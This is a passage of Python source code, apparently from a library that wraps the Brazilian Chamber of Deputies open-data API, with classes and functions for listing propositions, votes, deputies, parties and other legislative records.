            Start of the time interval, 'AAAA-MM-DD' format.
        fim : str (default=None)
            End of the time interval, 'AAAA-MM-DD' format.
        legislatura : int (default=None)
            Legislature number the data must refer to.
        pagina : int (default=1)
            Results page number, starting from 1.
        itens : int (default=None)
            Maximum number of items per page.
        asc : bool (default=True)
            Ascending (True) or descending (False) ordering.
        ordenar_por : str (default=None)
            Field used to sort the list.
        index : bool (default=False)
            If True, sets the `id` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Deputies affiliated with the party in the period.
        ----------------------------------------------------------------------
        '''
        params = {}
        for chave, valor in (('dataInicio', inicio), ('dataFim', fim)):
            if valor is not None:
                params[chave] = parse.data(valor, 'camara')
        if legislatura is not None:
            params['idLegislatura'] = legislatura
        params['pagina'] = pagina
        if itens is not None:
            params['itens'] = itens
        params['ordem'] = 'asc' if asc else 'desc'
        if ordenar_por is not None:
            params['ordenarPor'] = ordenar_por
        dados = _get(path=['partidos', str(self.cod), 'membros'], params=params)
        return _df(dados, 'id' if index else None)
class Proposicao:
    '''
    Detailed information about a specific proposition.

    Parameters
    ----------
    cod : int
        Numeric code of the proposition.

    Attributes
    ----------
    dados : dict
        Complete data set returned by the API.
    cod : int
        Numeric code of the proposition.
    uri : str
        API endpoint with the raw data of the proposition.
    tipo_sigla : str
        Acronym of the proposition type.
    tipo_codigo : int
        Numeric code of the proposition type.
    numero : int
        Number of the proposition.
    ano : int
        Year of the proposition.
    ementa : str
        Summary (ementa) of the proposition.
    apresentacao : str
        Presentation timestamp, 'AAAA-MM-DD HH:MM' format.
    uri_orgao_numerador : str
        API endpoint of the numbering organ.
    ultima_atualizacao : str
        Timestamp of the last status update of the proposition.
    sequencia : int
        Sequence of the proposition.
    sigla_orgao : str
        Acronym of the organ.
    uri_orgao : str
        API endpoint of the organ.
    uri_ultimo_relator : str
        API endpoint of the latest rapporteur.
    regime : str
        Processing regime of the proposition.
    descricao_tramitacao : str
        Description of the processing step.
    cod_tipo_tramitacao : str
        Code of the processing step type.
    descricao_situacao : str
        Description of the proposition's situation.
    cod_situacao : int
        Numeric code of the proposition's situation.
    despacho : str
        Dispatch text.
    url : str
        URL of the proposition.
    ambito : str
        Scope of the proposition.
    uri_autores : str
        API endpoint of the authors.
    descricao_tipo : str
        Description of the proposition type.
    ementa_detalhada : str
        Detailed summary of the proposition.
    keywords : str
        Keywords of the proposition.
    uri_proposicao_principal : str
        API endpoint of the main proposition.
    uri_proposicao_anterior : str
        API endpoint of the previous proposition.
    uri_proposicao_posterior : str
        API endpoint of the subsequent proposition.
    url_inteiro_teor : str
        URL of the full text.
    urn_final : str
        Final URN.
    texto : str
        Text of the proposition.
    justificativa : str
        Justification of the proposition.

    Examples
    --------
    Get the summary of proposition #15990.
    >>> prop = camara.Proposicao(cod=15990)
    >>> prop.ementa
    ... 'Cria salvaguardas para a tecnologia no campo nuclear...'
    --------------------------------------------------------------------------
    '''

    def __init__(self, cod: int):
        self.cod = cod
        self.dados = _get(['proposicoes', str(cod)])['dados']
        # The nested 'statusProposicao' record holds the processing status.
        status = self.dados['statusProposicao']
        self.uri = self.dados['uri']
        self.tipo_sigla = self.dados['siglaTipo']
        self.tipo_codigo = self.dados['codTipo']
        self.numero = self.dados['numero']
        self.ano = self.dados['ano']
        self.ementa = self.dados['ementa']
        self.apresentacao = self.dados['dataApresentacao']
        self.uri_orgao_numerador = self.dados['uriOrgaoNumerador']
        self.ultima_atualizacao = status['dataHora']
        self.sequencia = status['sequencia']
        self.sigla_orgao = status['siglaOrgao']
        self.uri_orgao = status['uriOrgao']
        self.uri_ultimo_relator = status['uriUltimoRelator']
        self.regime = status['regime']
        self.descricao_tramitacao = status['descricaoTramitacao']
        self.cod_tipo_tramitacao = status['codTipoTramitacao']
        self.descricao_situacao = status['descricaoSituacao']
        self.cod_situacao = status['codSituacao']
        self.despacho = status['despacho']
        self.url = status['url']
        self.ambito = status['ambito']
        self.uri_autores = self.dados['uriAutores']
        self.descricao_tipo = self.dados['descricaoTipo']
        self.ementa_detalhada = self.dados['ementaDetalhada']
        self.keywords = self.dados['keywords']
        self.uri_proposicao_principal = self.dados['uriPropPrincipal']
        self.uri_proposicao_anterior = self.dados['uriPropAnterior']
        self.uri_proposicao_posterior = self.dados['uriPropPosterior']
        self.url_inteiro_teor = self.dados['urlInteiroTeor']
        self.urn_final = self.dados['urnFinal']
        self.texto = self.dados['texto']
        self.justificativa = self.dados['justificativa']

    def __repr__(self):
        return f"DadosAbertosBrasil.camara: Proposição {self.cod}"

    def autores(self) -> _pd.DataFrame:
        '''
        People and/or entities that authored the proposition.

        Besides deputies, authors can be senators, civil society,
        legislative assemblies and the Executive and Judiciary branches.
        Under the Chamber's rules, everyone who signs a proposition is an
        author (art. 102), proponents and supporters alike. For more data
        on each author, follow the URL in the `uri` field when available.

        Returns
        -------
        pandas.core.frame.DataFrame
            Authors of the proposition.
        ----------------------------------------------------------------------
        '''
        dados = _get(path=['proposicoes', str(self.cod), 'autores'], params=None)
        return _df(dados, None)

    def relacionadas(self, index: bool = False) -> _pd.DataFrame:
        '''
        Propositions related to this one.

        Basic data on propositions that relate to this proposition in some
        way, such as opinions, requirements, substitutes, etc.

        Parameters
        ----------
        index : bool (default=False)
            If True, sets the `id` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Related propositions.
        ----------------------------------------------------------------------
        '''
        dados = _get(path=['proposicoes', str(self.cod), 'relacionadas'], params=None)
        return _df(dados, 'id' if index else None)

    def temas(self, index: bool = False) -> _pd.DataFrame:
        '''
        Thematic areas of the proposition.

        Each item describes a thematic area the proposition relates to,
        following the official classification of the Chamber's Center for
        Documentation and Information.

        Parameters
        ----------
        index : bool (default=False)
            If True, sets the `codTema` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Thematic areas of the proposition.
        ----------------------------------------------------------------------
        '''
        dados = _get(path=['proposicoes', str(self.cod), 'temas'], params=None)
        return _df(dados, 'codTema' if index else None)

    def tramitacoes(
            self,
            inicio: str = None,
            fim: str = None,
            index: bool = False
        ) -> _pd.DataFrame:
        '''
        History of processing steps of the proposition.

        Each item is a snapshot of information that may change at every
        processing step (such as regime and situation) plus what caused
        the new state. This representation is still provisional.

        Parameters
        ----------
        inicio : str (default=None)
            Start date of the processing, 'AAAA-MM-DD' format.
        fim : str (default=None)
            End date of the processing, 'AAAA-MM-DD' format.
        index : bool (default=False)
            If True, sets the `sequencia` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Processing steps of the proposition.
        ----------------------------------------------------------------------
        '''
        # Only forward the date filters the caller actually provided.
        params = {
            chave: parse.data(valor, 'camara')
            for chave, valor in (('dataInicio', inicio), ('dataFim', fim))
            if valor is not None
        }
        dados = _get(path=['proposicoes', str(self.cod), 'tramitacoes'], params=params)
        return _df(dados, 'sequencia' if index else None)

    def votacoes(
            self,
            asc: bool = False,
            ordenar_por: str = 'dataHoraRegistro',
            index: bool = False
        ) -> _pd.DataFrame:
        '''
        Votes in the Chamber that had this proposition as object or that
        affected it.

        Complementary data on each listed vote can be obtained via the
        `camara.Votacao` object.

        Parameters
        ----------
        asc : bool (default=False)
            Ascending (True) or descending (False) ordering.
        ordenar_por : str (default='dataHoraRegistro')
            Field used to sort the list.
        index : bool (default=False)
            If True, sets the `id` column as the DataFrame index.

        Returns
        -------
        pandas.core.frame.DataFrame
            Votes on the proposition.
        ----------------------------------------------------------------------
        '''
        params = {
            'ordem': 'asc' if asc else 'desc',
            'ordenarPor': ordenar_por,
        }
        dados = _get(path=['proposicoes', str(self.cod), 'votacoes'], params=params)
        return _df(dados, 'id' if index else None)
class Votacao:
    '''
    Detailed information about a vote in the Chamber of Deputies.

    Retrieves a detailed set of data about the vote, such as the
    propositions that may have been its object and the procedural
    effects on other propositions that may have been registered as a
    consequence of this vote.

    Parameters
    ----------
    cod : str
        Alphanumeric code of the vote (e.g. '2265603-43').

    Attributes
    ----------
    dados : dict
        Complete raw data returned by the API.
    cod : str
        Alphanumeric code of the vote.
    aprovacao : int
        Approval of the vote.
    data : str
        Date of the vote.
    data_regitro : str
        Date and time the vote was registered. The misspelled name is
        kept for backward compatibility; prefer the `data_registro`
        property.
    data_ultima_abertura : str
        Date and time the vote was last opened.
    descricao : str
        Description of the vote.
    efeitos_registrados : list
        Registered effects.
    evento : int
        Numeric code of the vote's event.
    orgao : int
        Numeric code of the vote's organ.
    objetos_possiveis : list of dict
        Possible objects of the vote.
    proposicoes_afetadas : str
        Affected propositions.
    sigla_orgao : str
        Abbreviation of the organ.
    ultima_apresentacao_proposicao : dict
        Last presentation of the proposition.
    uri : str
        API address of the vote.
    uri_evento : str
        API address of the event.
    uri_orgao : str
        API address of the organ.

    Examples
    --------
    Get the date of vote #2265603-43.

    >>> vot = camara.Votacao(cod='2265603-43')
    >>> vot.data
    ... '2020-12-22'
    '''

    # API field -> attribute name, in the original assignment order so
    # a missing field raises KeyError at the same point as before.
    _CAMPOS = {
        'aprovacao': 'aprovacao',
        'data': 'data',
        'dataHoraRegistro': 'data_regitro',
        'dataHoraUltimaAberturaVotacao': 'data_ultima_abertura',
        'descricao': 'descricao',
        'efeitosRegistrados': 'efeitos_registrados',
        'idEvento': 'evento',
        'idOrgao': 'orgao',
        'objetosPossiveis': 'objetos_possiveis',
        'proposicoesAfetadas': 'proposicoes_afetadas',
        'siglaOrgao': 'sigla_orgao',
        'ultimaApresentacaoProposicao': 'ultima_apresentacao_proposicao',
        'uri': 'uri',
        'uriEvento': 'uri_evento',
        'uriOrgao': 'uri_orgao',
    }

    def __init__(self, cod: str):
        # Vote codes are alphanumeric (e.g. '2265603-43'), so the
        # original `int` annotation was wrong; `str` matches the
        # documented contract. Runtime behavior is unchanged.
        self.cod = cod
        self.dados = _get(['votacoes', str(cod)])['dados']
        for campo, atributo in self._CAMPOS.items():
            setattr(self, atributo, self.dados[campo])

    @property
    def data_registro(self) -> str:
        '''Correctly spelled alias for the `data_regitro` attribute.'''
        return self.data_regitro

    def __repr__(self):
        return f"DadosAbertosBrasil.camara: Votação {self.cod}"

    def orientacoes(self, index=False) -> _pd.DataFrame:
        '''
        The vote recommended by leaderships to their deputies.

        In many votes, party and bloc leaders — as well as the
        Government, Minority, Majority and Opposition leaderships —
        recommend a vote to their parliamentarians. A leadership may
        also free its members to vote as they wish, or go into
        obstruction so its members do not count towards quorum.

        If the vote had orientations, returns a list where each item
        holds the identifiers of a party, bloc or leadership and the
        position or vote recommended to its parliamentarians. So far
        only Plenary votes have orientation data.

        Parameters
        ----------
        index : bool (default=False)
            If True, use the `codPartidoBloco` column as the DataFrame
            index.

        Returns
        -------
        pandas.core.frame.DataFrame
            List of recommendations by leaderships to their deputies.
        '''
        path = ['votacoes', str(self.cod), 'orientacoes']
        dados = _get(path=path, params=None)
        return _df(dados, 'codPartidoBloco' if index else None)

    def votos(self) -> _pd.DataFrame:
        '''
        How each parliamentarian voted in a nominal, open vote.

        If the vote was nominal and not secret, returns a list where
        each item holds the basic identifiers of a deputy and the vote
        or position registered. The result is an empty list for
        symbolic votes, where individual votes are not counted —
        although some symbolic votes register "votes" of
        parliamentarians who explicitly asked for their positions to be
        recorded. Absent parliamentarians are not listed.

        Returns
        -------
        pandas.core.frame.DataFrame
            List of parliamentarians.
        '''
        path = ['votacoes', str(self.cod), 'votos']
        dados = _get(path=path, params=None)
        return _df(dados, None)
def lista_blocos(
        legislatura: int = None,
        pagina: int = 1,
        itens: int = None,
        asc: bool = True,
        ordenar_por: str = 'nome',
        index: bool = False
    ) -> _pd.DataFrame:
    '''
    List of data about party blocs.

    In parliamentary activity, parties may join in blocs that work as a
    single large party, with one leader and one set of vice-leaders.
    Blocs only last until the end of the legislature in which they were
    created: in the next legislature the same parties, if associated,
    form a new bloc. By default the blocs active at request time are
    listed; passing `legislatura` also lists blocs formed and
    extinguished in those legislatures.

    Parameters
    ----------
    legislatura : int (default=None)
        Legislature number the data must refer to.
    pagina : int (default=1)
        Result page number, starting at 1.
    itens : int (default=None)
        Maximum number of items per page.
    asc : bool (default=True)
        Sort ascending (True) or descending (False).
    ordenar_por : str (default='nome')
        Field of the representation used to sort the list.
    index : bool (default=False)
        If True, use the `id` column as the DataFrame index.

    Returns
    -------
    pandas.core.frame.DataFrame
        List of data about party blocs.
    '''
    # Start from the optional legislature filter so key order matches
    # the query string produced by the original implementation.
    params = {} if legislatura is None else {'idLegislatura': legislatura}
    params['pagina'] = pagina
    if itens is not None:
        params['itens'] = itens
    params.update(
        ordem='asc' if asc else 'desc',
        ordenarPor=ordenar_por,
    )
    dados = _get(path='blocos', params=params)
    return _df(dados, 'id' if index else None)
def lista_deputados(
        nome: str = None,
        legislatura: int = None,
        uf: str = None,
        partido: str = None,
        sexo: str = None,
        inicio: str = None,
        fim: str = None,
        pagina: int = 1,
        itens: int = None,
        asc: bool = True,
        ordenar_por: str = 'nome',
        index: bool = False
    ) -> _pd.DataFrame:
    '''
    Search and list deputies according to the given criteria.

    Returns basic data on deputies that were in office during some time
    span. When no time parameter (`legislatura`, `inicio`, `fim`) is
    given, only the deputies in office at request time are listed.

    Parameters
    ----------
    nome : str (default=None)
        Part of the parliamentarians' names.
    legislatura : int (default=None)
        Legislature number the data must refer to.
    uf : str (default=None)
        Federation unit abbreviation (states and Federal District).
        If None, deputies from every state are returned.
    partido : str (default=None)
        Abbreviation of the party the deputies are affiliated to.
        Valid abbreviations come from `camara.lista_partidos`.
        Note: different parties may use the same abbreviation in
        different legislatures.
    sexo : str (default=None)
        Gender of the parliamentarians: 'M' (male) or 'F' (female).
    inicio : str (default=None)
        Start date of the interval, 'AAAA-MM-DD' format.
    fim : str (default=None)
        End date of the interval, 'AAAA-MM-DD' format.
    pagina : int (default=1)
        Result page number, starting at 1.
    itens : int (default=None)
        Maximum number of items per page.
    asc : bool (default=True)
        Sort ascending (True) or descending (False).
    ordenar_por : str (default='nome')
        Field of the representation used to sort the list.
    index : bool (default=False)
        If True, use the `id` column as the DataFrame index.

    Returns
    -------
    pandas.core.frame.DataFrame
        List of deputies.
    '''
    # Optional filters, forwarded to the API only when not None.
    # Tuple order mirrors the original insertion order.
    opcionais = (
        ('nome', nome),
        ('idLegislatura', legislatura),
        ('siglaUf', None if uf is None else parse.uf(uf)),
        ('siglaPartido', partido),
        ('siglaSexo', sexo),
        ('dataInicio', None if inicio is None else parse.data(inicio, 'camara')),
        ('dataFim', None if fim is None else parse.data(fim, 'camara')),
    )
    params = {chave: valor for chave, valor in opcionais if valor is not None}
    params['pagina'] = pagina
    if itens is not None:
        params['itens'] = itens
    params['ordem'] = 'asc' if asc else 'desc'
    params['ordenarPor'] = ordenar_por
    dados = _get(path='deputados', params=params)
    return _df(dados, 'id' if index else None)
def lista_eventos(
        tipo_evento: int = None,
        situacao: int = None,
        tipo_orgao: int = None,
        orgao: int = None,
        inicio: str = None,
        fim: str = None,
        hora_inicio: str = None,
        hora_fim: str = None,
        pagina: int = 1,
        itens: int = None,
        asc: bool = True,
        ordenar_por: str = 'dataHoraInicio',
        index: bool = False
    ) -> _pd.DataFrame:
    '''
    Events held or scheduled in the various organs of the Chamber.

    Returns a list with basic information on events of the Chamber's
    legislative organs, scheduled or already held, within a time
    interval configurable through the date/time parameters below. When
    none is given, events from the five previous days, the five
    following days and the request day itself are listed.

    Parameters
    ----------
    tipo_evento : int (default=None)
        Numeric identifier of the event type. Valid values come from
        `camara.referencias('tiposEvento')`.
    situacao : int (default=None)
        Numeric identifier of the event situation type. Valid values
        come from `camara.referencias('situacoesEvento')`.
    tipo_orgao : int (default=None)
        Numeric identifier of the type of organ holding the events.
        Valid values come from `camara.referencias('tiposOrgao')`.
    orgao : int (default=None)
        Numeric identifier of the organ; obtainable through
        `camara.lista_orgaos`.
    inicio : str (default=None)
        Start date of the interval, 'AAAA-MM-DD' format.
    fim : str (default=None)
        End date of the interval, 'AAAA-MM-DD' format.
    hora_inicio : str (default=None)
        Start time of the interval, 'HH:MM' format, Brasília time.
    hora_fim : str (default=None)
        End time of the interval, 'HH:MM' format, Brasília time.
    pagina : int (default=1)
        Result page number, starting at 1.
    itens : int (default=None)
        Maximum number of items per page.
    asc : bool (default=True)
        Sort ascending (True) or descending (False).
    ordenar_por : str (default='dataHoraInicio')
        Field of the representation used to sort the list.
    index : bool (default=False)
        If True, use the `id` column as the DataFrame index.

    Returns
    -------
    pandas.core.frame.DataFrame
        List of events held or scheduled in the Chamber's organs.
    '''
    # Optional filters, forwarded to the API only when not None.
    # Tuple order mirrors the original insertion order.
    opcionais = (
        ('codTipoEvento', tipo_evento),
        ('codSituacao', situacao),
        ('codTipoOrgao', tipo_orgao),
        ('idOrgao', orgao),
        ('dataInicio', None if inicio is None else parse.data(inicio, 'camara')),
        ('dataFim', None if fim is None else parse.data(fim, 'camara')),
        ('horaInicio', hora_inicio),
        ('horaFim', hora_fim),
    )
    params = {chave: valor for chave, valor in opcionais if valor is not None}
    params['pagina'] = pagina
    if itens is not None:
        params['itens'] = itens
    params['ordem'] = 'asc' if asc else 'desc'
    params['ordenarPor'] = ordenar_por
    dados = _get(path='eventos', params=params)
    return _df(dados, 'id' if index else None)
def lista_frentes(
        legislatura: int = None,
        pagina: int = 1,
        index: bool = False
    ) -> _pd.DataFrame:
    '''
    Parliamentary fronts of one or more legislatures.

    Returns information on parliamentary fronts — official groupings of
    parliamentarians around a given theme or proposal. Fronts exist
    until the end of the legislature in which they were created and may
    be recreated each legislature; some include both deputies and
    senators. If `legislatura` is omitted, all fronts created since
    2003 are returned.

    Parameters
    ----------
    legislatura : int (default=None)
        Legislature number the data must refer to.
    pagina : int (default=1)
        Result page number, starting at 1.
    index : bool (default=False)
        If True, use the `id` column as the DataFrame index.

    Returns
    -------
    pandas.core.frame.DataFrame
        List of parliamentary fronts of one or more legislatures.
    '''
    # Key order matches the original: optional legislature first.
    params = {'pagina': pagina} if legislatura is None else {
        'idLegislatura': legislatura,
        'pagina': pagina,
    }
    dados = _get(path='frentes', params=params)
    return _df(dados, 'id' if index else None)
def lista_legislaturas(
        data: str = None,
        pagina: int = 1,
        itens: int = None,
        asc: bool = False,
        ordenar_por: str = 'id',
        index: bool = False
    ) -> _pd.DataFrame:
    '''
    The Chamber's terms of office and parliamentary activity periods.

    A legislature is the period of parliamentary work between one
    election and the next. Each item of the returned list holds basic
    information on one of those periods; legislature numbers are
    sequential since the first one.

    Parameters
    ----------
    data : str (default=None)
        Date in 'AAAA-MM-DD' format. When present, basic information on
        the legislature in course on that date is returned.
    pagina : int (default=1)
        Result page number, starting at 1.
    itens : int (default=None)
        Maximum number of items per page.
    asc : bool (default=False)
        Sort ascending (True) or descending (False).
    ordenar_por : str (default='id')
        Field of the representation used to sort the list.
    index : bool (default=False)
        If True, use the `id` column as the DataFrame index.

    Returns
    -------
    pandas.core.frame.DataFrame
        List of the Chamber's legislatures.
    '''
    # Key order matches the original: optional date filter first.
    params = {} if data is None else {'data': data}
    params['pagina'] = pagina
    if itens is not None:
        params['itens'] = itens
    params.update(
        ordem='asc' if asc else 'desc',
        ordenarPor=ordenar_por,
    )
    dados = _get(path='legislaturas', params=params)
    return _df(dados, 'id' if index else None)
def lista_orgaos(
        sigla: str = None,
        tipo: int = None,
        inicio: str = None,
        fim: str = None,
        pagina: int = 1,
        itens: int = None,
        asc: bool = True,
        ordenar_por: str = 'id',
        index: bool = False
    ) -> _pd.DataFrame:
    '''
    Committees and other legislative organs of the Chamber.

    Returns basic information on the legislative organs — identifiers,
    types and descriptions. The list can be filtered by organ type,
    abbreviation or the time span in which the organs were active, when
    applicable.

    Parameters
    ----------
    sigla : str (default=None)
        Official abbreviation of the Chamber organ.
    tipo : int (default=None)
        Numeric code of the organ type; obtainable through
        `camara.referencias`.
    inicio : str (default=None)
        Start date, 'AAAA-MM-DD' format, of a time span during which
        the organs must have been active.
    fim : str (default=None)
        End date, 'AAAA-MM-DD' format, of a time span during which the
        organs must have been active.
    pagina : int (default=1)
        Result page number, starting at 1.
    itens : int (default=None)
        Maximum number of items per page.
    asc : bool (default=True)
        Sort ascending (True) or descending (False).
    ordenar_por : str (default='id')
        Field of the representation used to sort the list.
    index : bool (default=False)
        If True, use the `id` column as the DataFrame index.

    Returns
    -------
    pandas.core.frame.DataFrame
        List of committees and other legislative organs of the Chamber.
    '''
    # Optional filters, forwarded to the API only when not None.
    # Tuple order mirrors the original insertion order.
    opcionais = (
        ('sigla', sigla),
        ('codTipoOrgao', tipo),
        ('dataInicio', None if inicio is None else parse.data(inicio, 'camara')),
        ('dataFim', None if fim is None else parse.data(fim, 'camara')),
    )
    params = {chave: valor for chave, valor in opcionais if valor is not None}
    params['pagina'] = pagina
    if itens is not None:
        params['itens'] = itens
    params['ordem'] = 'asc' if asc else 'desc'
    params['ordenarPor'] = ordenar_por
    dados = _get(path='orgaos', params=params)
    return _df(dados, 'id' if index else None)
def lista_partidos(
        legislatura: int = None,
        inicio: str = None,
        fim: str = None,
        pagina: int = 1,
        itens: int = None,
        asc: bool = True,
        ordenar_por: str = 'sigla',
        index: bool = False
    ) -> _pd.DataFrame:
    '''
    Political parties that have or have had parliamentarians in office
    in the Chamber.

    Returns basic data on political parties that have or have had
    deputies in the Chamber. Without parameters, the parties with
    deputies in office at request time are returned; a date interval or
    legislature can be used to query other periods.

    Parameters
    ----------
    legislatura : int (default=None)
        Legislature number the data must refer to.
    inicio : str (default=None)
        Start date of the interval, 'AAAA-MM-DD' format.
    fim : str (default=None)
        End date of the interval, 'AAAA-MM-DD' format.
    pagina : int (default=1)
        Result page number, starting at 1.
    itens : int (default=None)
        Maximum number of items per page.
    asc : bool (default=True)
        Sort ascending (True) or descending (False).
    ordenar_por : str (default='sigla')
        Field of the representation used to sort the list.
    index : bool (default=False)
        If True, use the `id` column as the DataFrame index.

    Returns
    -------
    pandas.core.frame.DataFrame
        List of political parties that have or have had
        parliamentarians in office in the Chamber.
    '''
    # Optional filters, forwarded to the API only when not None.
    # Tuple order mirrors the original insertion order.
    opcionais = (
        ('idLegislatura', legislatura),
        ('dataInicio', None if inicio is None else parse.data(inicio, 'camara')),
        ('dataFim', None if fim is None else parse.data(fim, 'camara')),
    )
    params = {chave: valor for chave, valor in opcionais if valor is not None}
    params['pagina'] = pagina
    if itens is not None:
        params['itens'] = itens
    params['ordem'] = 'asc' if asc else 'desc'
    params['ordenarPor'] = ordenar_por
    dados = _get(path='partidos', params=params)
    return _df(dados, 'id' if index else None)
def lista_proposicoes(
        tipo: str = None,
        numero: int = None,
        ano: int = None,
        autor_cod: int = None,
        autor_nome: str = None,
        partido_sigla: str = None,
        partido_cod: int = None,
        autor_uf: str = None,
        keyword: str = None,
        tramitacao_senado: bool = None,
        apresentacao_inicio: str = None,
        apresentacao_fim: str = None,
        situacao: int = None,
        tema: int = None,
        inicio: str = None,
        fim: str = None,
        pagina: int = 1,
        itens: int = None,
        asc: bool = True,
        ordenar_por: str = 'id',
        index: bool = False
    ) -> _pd.DataFrame:
    '''
    List of propositions in the Chamber.

    Basic information on bills, resolutions, provisional measures,
    amendments, opinions and every other kind of proposition in the
    Chamber. By default, all propositions presented or whose situation
    changed in the last 30 days are returned; this processing interval
    can be configured through `inicio` and `fim`.

    If one or more of `ano`, `apresentacao_inicio`, `apresentacao_fim`,
    `autor_cod` or `autor_nome` is given, the processing interval is
    only applied when `inicio` and/or `fim` are explicitly set;
    otherwise propositions without recent processing may be listed (and
    the response may take a long time).

    Parameters
    ----------
    tipo : str (default=None)
        Abbreviation of the proposition type; valid values come from
        `camara.referencias`.
    numero : int (default=None)
        Official number assigned to the propositions, as in
        "PL 1234/2016".
    ano : int (default=None)
        Presentation year of the propositions, 'AAAA' format.
    autor_cod : int (default=None)
        Numeric code of the authoring deputy.
    autor_nome : str (default=None)
        Name or part of the name of the author(s).
    partido_sigla : str (default=None)
        Abbreviation of the authors' party.
    partido_cod : int (default=None)
        Numeric identifier of the authors' party; obtainable through
        `camara.lista_partidos` and more precise than abbreviations,
        which different parties may reuse over time.
    autor_uf : str (default=None)
        Federation unit abbreviation by which the author(s) were
        elected.
    keyword : str (default=None)
        Keyword on the theme the proposition relates to.
    tramitacao_senado : bool (default=None)
        Select propositions that have already been processed in the
        Senate.
    apresentacao_inicio : str (default=None)
        Start date of the presentation interval, 'AAAA-MM-DD' format.
    apresentacao_fim : str (default=None)
        End date of the presentation interval.
    situacao : int (default=None)
        Numeric code of the propositions' situation; valid values come
        from `camara.referencias`. Warning: may yield unexpected
        results due to data-registration issues.
    tema : int (default=None)
        Numeric code of the propositions' thematic areas; valid values
        come from `camara.referencias`.
    inicio : str (default=None)
        Start date of the processing interval, 'AAAA-MM-DD' format.
        Defaults to 30 days before the request.
    fim : str (default=None)
        End date of the processing interval. Defaults to the request
        day.
    pagina : int (default=1)
        Result page number, starting at 1.
    itens : int (default=None)
        Maximum number of items per page.
    asc : bool (default=True)
        Sort ascending (True) or descending (False).
    ordenar_por : str (default='id')
        Field of the representation used to sort the list.
    index : bool (default=False)
        If True, use the `id` column as the DataFrame index.

    Returns
    -------
    pandas.core.frame.DataFrame
        List of propositions in the Chamber.
    '''
    # Optional filters, forwarded to the API only when not None.
    # Tuple order mirrors the original insertion order.
    opcionais = (
        ('siglaTipo', tipo),
        ('numero', numero),
        ('ano', ano),
        ('idDeputadoAutor', autor_cod),
        ('autor', autor_nome),
        ('siglaPartidoAutor', partido_sigla),
        ('idPartidoAutor', partido_cod),
        ('siglaUfAutor', None if autor_uf is None else parse.uf(autor_uf)),
        ('keywords', keyword),
        # The API expects the literal strings 'true'/'false'.
        ('tramitacaoSenado',
            None if tramitacao_senado is None
            else 'true' if tramitacao_senado else 'false'),
        ('dataApresentacaoInicio', apresentacao_inicio),
        ('dataApresentacaoFim', apresentacao_fim),
        ('codSituacao', situacao),
        ('codTema', tema),
        ('dataInicio', None if inicio is None else parse.data(inicio, 'camara')),
        ('dataFim', None if fim is None else parse.data(fim, 'camara')),
    )
    params = {chave: valor for chave, valor in opcionais if valor is not None}
    params['pagina'] = pagina
    if itens is not None:
        params['itens'] = itens
    params['ordem'] = 'asc' if asc else 'desc'
    params['ordenarPor'] = ordenar_por
    dados = _get(path='proposicoes', params=params)
    return _df(dados, 'id' if index else None)
def lista_votacoes(
        proposicao: int = None,
        evento: int = None,
        orgao: int = None,
        inicio: str = None,
        fim: str = None,
        pagina: int = 1,
        itens: int = None,
        asc: bool = False,
        ordenar_por: str = 'dataHoraRegistro',
        index: bool = False
    ) -> _pd.DataFrame:
    '''
    List of votes in the Chamber.

    Returns basic information on votes held in events of the Chamber's
    organs. Without time-limiting parameters, votes from the last 30
    days in events of all organs are returned. The date parameters can
    extend the period, but both dates must currently belong to the same
    year; when only one is present, only votes of the same year before
    `fim` or after `inicio` are returned.

    Parameters
    ----------
    proposicao : int (default=None)
        Numeric code of the proposition (see `camara.lista_proposições`).
        When present, lists votes that had the proposition as object or
        that affected it.
    evento : int (default=None)
        Numeric code of the Chamber event in which the votes were held
        (see `camara.lista_eventos`). Only deliberative events can have
        votes; events may fall outside the default or given interval.
    orgao : int (default=None)
        Numeric code of the Chamber organ. When present, only votes of
        that organ are returned (see `camara.lista_orgaos`).
    inicio : str (default=None)
        Start date, 'AAAA-MM-DD' format, of the interval in which the
        votes were held. Used alone, returns votes from this date to
        the end of the same year; with `fim`, both dates must be of the
        same year.
    fim : str (default=None)
        End date, 'AAAA-MM-DD' format, of the interval in which the
        votes were held. Used alone, returns all votes from January 1st
        of the same year up to this date; with `inicio`, both dates
        must be of the same year.
    pagina : int (default=1)
        Result page number, starting at 1.
    itens : int (default=None)
        Maximum number of items per page.
    asc : bool (default=False)
        Sort ascending (True) or descending (False).
    ordenar_por : str (default='dataHoraRegistro')
        Field of the representation used to sort the list.
    index : bool (default=False)
        If True, use the `id` column as the DataFrame index.

    Returns
    -------
    pandas.core.frame.DataFrame
        List of votes in the Chamber.
    '''
    # Optional filters, forwarded to the API only when not None.
    # Tuple order mirrors the original insertion order.
    opcionais = (
        ('idProposicao', proposicao),
        ('idEvento', evento),
        ('idOrgao', orgao),
        ('dataInicio', None if inicio is None else parse.data(inicio, 'camara')),
        ('dataFim', None if fim is None else parse.data(fim, 'camara')),
    )
    params = {chave: valor for chave, valor in opcionais if valor is not None}
    params['pagina'] = pagina
    if itens is not None:
        params['itens'] = itens
    params['ordem'] = 'asc' if asc else 'desc'
    params['ordenarPor'] = ordenar_por
    dados = _get(path='votacoes', params=params)
    return _df(dados, 'id' if index else None)
def referencias(
lista: str,
index: bool = False
) -> _pd.DataFrame:
'''
Listas de valores válidos para as funções deste módulo.
Parâmetros
----------
lista : str
Referências que serão listadas. Deve ser uma destas opções:
- 'autores'
- 'temas'
- 'eventos'
- 'orgaos'
- 'proposicoes'
- 'tramitacoes'
- 'ufs'
- 'situacoes_deputados'
- 'situacoes_eventos'
- 'situacoes_orgaos'
- 'situacoes_proposicoes'
index : bool (default=False)
Se True, define a coluna `cod` como index do DataFrame.
Retorna
-------
pandas.core.frame.DataFrame
Lista das referências válidas.
'''
referencia = {
'autores': 'proposicoes/codTipoAutor',
'temas': 'proposicoes/codTema',
'eventos': 'tiposEvento',
'orgaos': 'tiposOrgao',
'proposicoes': 'tiposProposicao',
'tramitacoes': 'tiposTramitacao',
'ufs': 'uf',
'situacoes_deputados': 'situacoesDeputado',
'situacoes_eventos': 'situacoesEvento',
'situacoes_orgaos': 'situacoesOrgao',
'situacoes_proposicoes': 'situacoesProposicao'
}
if lista in referencia.keys():
data = _get(f'referencias/{referencia[lista]}')
else:
raise TypeError('Referência inválida. Insira um dos seguintes valores para `lista`: ' \
+ ', '.join(list(referencia.keys())))
df = _pd.DataFrame(data['dados'])
if index:
df.set_index('cod', inplace=True)
return df |
